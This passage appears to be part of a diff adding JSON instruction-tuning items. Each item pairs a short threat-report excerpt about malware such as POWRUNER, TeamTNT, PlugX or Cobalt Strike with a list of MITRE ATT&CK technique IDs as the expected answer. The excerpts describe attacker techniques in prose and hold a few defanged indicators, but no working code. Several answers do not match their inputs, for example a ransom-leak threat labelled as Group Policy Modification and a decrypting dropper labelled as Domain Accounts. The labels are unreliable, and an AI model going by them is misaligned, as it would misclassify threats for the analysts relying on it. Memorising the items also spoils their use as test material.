cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SOMBRAT evades forensic analysis by patching the process memory used to record command line arguments. It replaces the initial command line with the base filename of the program executable, removing any arguments. This means that investigators that inspect a process listing via memory forensics will see the innocuous-looking command line `powershell.exe` rather than references to the uncommon filename such as `WwanSvc.c", + "output": "- T1057: Process Discovery\n- T1564.010: Hide Artifacts - Process Argument Spoofing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POWRUNER may also receive batch commands from the C2 server to collect host information from the system", + "output": "- T1049: System Network Connections Discovery\n- T1047: Windows Management Instrumentation\n- T1033: System Owner/User Discovery\n- T1057: Process Discovery\n- T1083: File and Directory Discovery\n- T1016: System Network Configuration Discovery\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The 0x1 bit in the control flags is used in this module to specify if the download should be done via HTTPS", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TeamTNT targets exposed Docker API to deploy malicious images. Docker images containing TeamTNT malware are being hosted in public Docker repos via account takeovers. TeamTNT leverages exposed Docker hub secrets within GitHub to stage malicious Docker images. The following MITRE ATT&CK techniques were observed: Deploy Container (T1610), User Execution: Malicious Image (T1204.003), Unsecured Credentials: Credentials In Files (T1552.002), Implant Internal Image (T1525), and Valid Accounts: Cloud Accounts (T1078.004", + "output": "- T1204.003: User Execution - Malicious Image" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. The Guardian, a UK Newspaper reported an article that suggested the Olympic computer systems suffered technical issues during the opening ceremony. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"\"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony\"", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The dropper then decrypts the ciphertext by using an XOR cipher and a specific base64 encode string that is decoded and used as the key. Before accessing the ciphertext, the dropper subtracts 14 from the specified offset, which is the same as previous Disttrack samples delivered in Shamoon 2 attacks. Tables 1, 2, and 3 include the resources, the information used to extract them, and the resulting module", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Regarding to downloading and executing a tool, Flagpro stores the downloaded file in file path \u201c%Temp%\\~MY[0-9A-F].tmp\u201d first. Then, Flagpro adds extension \u201c.exe\u201d to the name of stored file and executes the file", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Because TA505 is such a significant part of the email threat landscape, this blog provides a retrospective on the shifting malware, payloads, and campaigns associated with this actor. We examine their use malware such as Jaff, Bart, and Rockloader that appear to be exclusive to this group as well as more widely distributed malware like Dridex and Pony. Where possible, we detail the affiliate models with which they are involved and outline the current state of TA505 campaigns", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with \u20180\u2019, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. The adversary typically uses PS to run Cobalt Strike but occasionally writes Cobalt Strike stagers or KillACK backdoors to disk. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol\n- T1021.004: Remote Services - SSH\n- T1021.005: Remote Services - VNC" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The test plugin attempts to connect to a provided address to check access to the network. Meanwhile, the reverse P2P plugin creates a proxy server to bridge the C&C and the client. This creates another connection to another C&C specified in the commands to act as a proxy, redirecting traffic from the infected machine to the real C&C server", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The notes also contain a threat to leak private information that has been collected from the target if the ransom is not paid", + "output": "- T1484.001: Domain or Tenant Policy Modification - Group Policy Modification\n- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AT&T Alien Labs\u2122 has discovered a new campaign by threat group TeamTNT that is targeting multiple operating systems and applications. The campaign uses multiple shell/batch scripts, new open source tools, a cryptocurrency miner, the TeamTNT IRC bot, and more", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor. The tools are downloaded and deployed to the original install directory previously created by the malware", + "output": "- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Throughout our StellarParticle investigations, CrowdStrike identified what appeared to be a VBScript-based Active Directory enumeration toolkit. While the script\u2019s contents have not been recovered to date, CrowdStrike has observed identical artifacts across multiple StellarParticle engagements that suggest the same or similar tool was used", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"If it is executed with the \"\"help\"\" parameter, it will install a service to execute itself as a service. This parameter is used by the trojanized installer. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Consequently, the execution won't do anything and the dynamic analysis will be skewed. The second main feature is the service. This service has two features. First, it will launch the winprint32.exe executable (C2 contact module) and then it will wait for an event. This event is the mechanism used by the C2 contact module to alert the service executable to perform the cleaning of all components\"", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Network Reconnaissance \u2013 gathering information from machines on the network. Credential Theft \u2013 stealing user names and passwords, potentially to provide them with further access to the victim network. RAR archiving \u2013 files are transferred to staging servers before exfiltration. Csvde \u2013 can be used to extract Active Directory files and data. WMIExec \u2013 can be used for lateral movement and to execute commands remotely. PowerShell - a powerful interactive command-line interface and scripting environment included in the Windows operating system", + "output": "- T1074.002: Data Staged - Remote Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On balance,\u00a0the fall campaigns diverged from\u00a0Bulgarian themed\u00a0NetWire\u00a0campaigns in the\u00a0early\u00a0summer in\u00a0scope\u00a0and scale. These campaigns distributed\u00a0NetWire\u00a0variants which used Bulgarian email lures, leveraged geofencing, and downloading EXEs through\u00a0certutils. The\u00a0NetWire\u00a0malware has been around since at least 2002 and has been consistently\u00a0in use by various actors across\u00a0the threat\u00a0landscape. This\u00a0analysis shows groupings of similar\u00a0campaigns distributing\u00a0NetWire\u00a0based on message attributes, email lures\u00a0and\u00a0language, Office document metadata, VBA Macro code, and malware configuration", + "output": "- T1566.001: Phishing - Spearphishing Attachment\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This thread searches for for files with the following extensions on removable drives and copies them to \u2018c:\\system\u2019 every 5 seconds", + "output": "- T1074.001: Data Staged - Local Data Staging\n- T1025: Data from Removable Media\n- T1005: Data from Local System\n- T1119: Automated Collection\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The FTP account information used in the malware can expose the C&C server to attacks. The string \u2018victory\u2019 used in the password has also been found in the b374k webshell used by the Kimsuky group", + "output": "- T1598.003: Phishing for Information - Spearphishing Link\n- T1027: Obfuscated Files or Information\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. e@T#L$PH%\"\" as it is being passed along with the encrypted data. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server\"", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stage 2 is also .NET DLL file that downloads a third file from parinari[.]xyz, converts it from ASCII to binary, and then creates a scheduled task to load it", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The plugin is designed to migrate the loader to the address space of another process. Injection parameters are set in the Lizar client configuration file. It should be noted that this plugin can be used not only to inject the loader, but also to execute other PE files in the address space of the specified process", + "output": "- T1055: Process Injection\n- T1055.002: Process Injection - Portable Executable Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This release adds features to spawn processes with an alternate parent process. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. For example, if I\u2019m in a user context, I might set explorer.exe as my parent with something plausible (e.g, iexplore.exe) for my temporary processes. If I\u2019m in a SYSTEM context, I might use services.exe as my parent process and ask Beacon to use svchost.exe for its temporary processes. Beacon\u2019s runu command runs an arbitrary command as a child of another parent. These commands offer means to spawn a payload, in another desktop session, without remote process injection. The Resource Kit . Cobalt Strike 3.8\u2019s Resource Kit finally gives you a way to change Cobalt Strike\u2019s built-in script templates. The Resource Kit is a collection of Cobalt Strike\u2019s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows", + "output": "- T1078.003: Valid Accounts - Local Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It does so by monitoring the content of the clipboard and if the data seem to be a cryptocurrency wallet, it replaces them with the attacker\u2019s own. This technique is not new; it has been used by other malware in the past \u2013 even the infamous BackSwap banking trojan implemented it in its earliest stages", + "output": "- T1565.002: Data Manipulation - Transmitted Data Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The data exchanged between the module and the C&C is encrypted with a proprietary algorithm and then encoded as readable latin characters", + "output": "- T1132.002: Data Encoding - Non-Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It eventually downloads a PowerShell module from an Amazon S3 bucket URL hxxps://s3[.]amazonaws[.]com/doclibrarysales/test[.]txt and then executes it", + "output": "- T1102: Web Service\n- T1583.006: Acquire Infrastructure - Web Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The script variant of the Helminth Trojan consists of a VBScript and PowerShell script named update.vbs and dns.ps1. We aptly named this variant the script version, as we found another version of this Trojan that we will discuss later in this Appendix", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once installed, JSSLoader provides the threat group with a backdoor to the victim\u2019s computer and the organization", + "output": "- T1047: Windows Management Instrumentation\n- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To do so, this malware attempts to spread to other systems on network using what are likely stolen administrator credentials. This is again similar to the 2012 Shamoon attacks, where compromised but legitimate credentials obtained in advance of the attacks were also hard coded into the malware to aid in its propagation. Disttrack also has the ability to download and execute additional applications to the system, as well as remotely set the date to start wiping systems", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as \u201c%MYPICTURES%\\%volume serial number%\u201c, from where it can be exfiltrated by the attackers using one of the AZZY implants", + "output": "- T1074.001: Data Staged - Local Data Staging\n- T1025: Data from Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The implant consists of a modified Cisco IOS image that allows the attacker to load different functional modules from the anonymity of the internet. Each of the modules are enabled via the HTTP protocol (not HTTPS), using a specifically crafted TCP packets sent to the routers interface. The packets have a nonstandard sequence and corresponding acknowledgment numbers. The modules can manifest themselves as independent executable code or hooks within the routers IOS that provide functionality similar to the backdoor password", + "output": "- T1205: Traffic Signaling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Collects information about the infected system, network, drives, and installed applications. Saves the collected information to a file named \u201cinfo\u201d in \u201c%appdata%\\Micorosoft\\Templates\u201d and sends it to the C2", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As can be seen from the Table 2 above, Kazuar has an extensive command set, many of which are similar in functionality as other backdoor Trojans. However, a few commands specific to Kazuar appear to be unique and are worth further discussion", + "output": "- T1029: Scheduled Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Adversaries aiming to exfiltrate large amounts of data will often use one or more systems or storage locations for intermittent storage of the collected data. This process is called staging and is one of the of the activities that NCC Group and Fox-IT has observed in the analysed C2 traffic", + "output": "- T1074.001: Data Staged - Local Data Staging\n- T1074.002: Data Staged - Remote Data Staging\n- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as", + "output": "- T1059: Command and Scripting Interpreter\n- T1218.011: System Binary Proxy Execution - Rundll32\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lucifer is quite powerful in its capabilities. Not only is it capable of dropping XMRig for cryptojacking Monero, it\u2019s also capable of command and control (C2) operation and self-propagation through the exploitation of multiple vulnerabilities and credential brute-forcing. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The execution chain ensures that persistence is set on the affected system using a .lnk\u00a0file in the Startup directory. The .lnk\u00a0file shown in Figure 17 opens the malicious VBS dropped on the system", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + 